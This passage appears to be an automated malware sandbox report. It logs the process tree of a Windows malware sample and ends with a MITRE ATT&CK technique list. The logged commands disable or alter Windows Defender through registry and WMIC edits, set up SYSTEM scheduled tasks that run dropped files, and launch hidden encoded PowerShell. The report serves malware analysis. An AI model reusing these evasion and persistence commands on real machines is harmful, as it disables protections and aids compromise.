    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTXlTkGoDPQchyzd /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:968
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gEfljGhZS" /SC once /ST 03:43:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3612
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gEfljGhZS"
  2⤵
  PID:3312
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gEfljGhZS"
  2⤵
  PID:2088
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zjtCPqTOixnxYITTP" /SC once /ST 05:27:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\kKGgJLM.exe\" XQ /bqbkdidyQ 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:2432
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "zjtCPqTOixnxYITTP"
  2⤵
  PID:3240
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 788
  2⤵
  - Program crash
  PID:1016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1424
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4888

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1768

C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\kKGgJLM.exe
C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\kKGgJLM.exe XQ /bqbkdidyQ 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3720
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:3744
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:2992
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:3336
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4648
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:224
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4500
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:4760
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:1236
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:3024
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4344
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:1060
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:3300
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4024
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:840
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4712
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1768
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5080
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bjeWJKrHnPpdAGCduF"
  2⤵
  PID:3228
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:4612
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:4268
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:1868
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3876
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:4640
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RgdiTWAdU\ibnZZl.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gwLAkOfFqvEnRPY" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:2624
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gwLAkOfFqvEnRPY2" /F /xml "C:\Program Files (x86)\RgdiTWAdU\rbamWFx.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3200
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gwLAkOfFqvEnRPY"
  2⤵
  PID:2624
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gwLAkOfFqvEnRPY"
  2⤵
  PID:3352
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "pkYJRvtpGfZaSU" /F /xml "C:\Program Files (x86)\dLLzADClkagU2\EhbGVIS.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3612
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "yMFQLDLxyvLyt2" /F /xml "C:\ProgramData\KTrRWZTJHHaefVVB\IRsHPLF.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4640
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "raxKGaIGjdREsorgF2" /F /xml "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\ErwKKvV.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "JnvrxUwmUummIDFugIt2" /F /xml "C:\Program Files (x86)\wGxkUGMqSkfBC\tpuapcA.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4268
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "mFeioppqsVnzBGRpZ" /SC once /ST 00:29:33 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\aLakUjUQ\ewVUavl.dll\",#1 /OdidyjGN 525403" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:3244
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "mFeioppqsVnzBGRpZ"
  2⤵
  PID:1060
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "zjtCPqTOixnxYITTP"
  2⤵
  PID:448
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 1984
  2⤵
  - Program crash
  PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4972 -ip 4972
1⤵
PID:1112

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTXlTkGoDPQchyzd\aLakUjUQ\ewVUavl.dll",#1 /OdidyjGN 525403
1⤵
PID:4812
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTXlTkGoDPQchyzd\aLakUjUQ\ewVUavl.dll",#1 /OdidyjGN 525403
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  PID:1416
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "mFeioppqsVnzBGRpZ"
    3⤵
    PID:2548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1840 -ip 1840
1⤵
PID:4444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3720 -ip 3720
1⤵
PID:2644

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion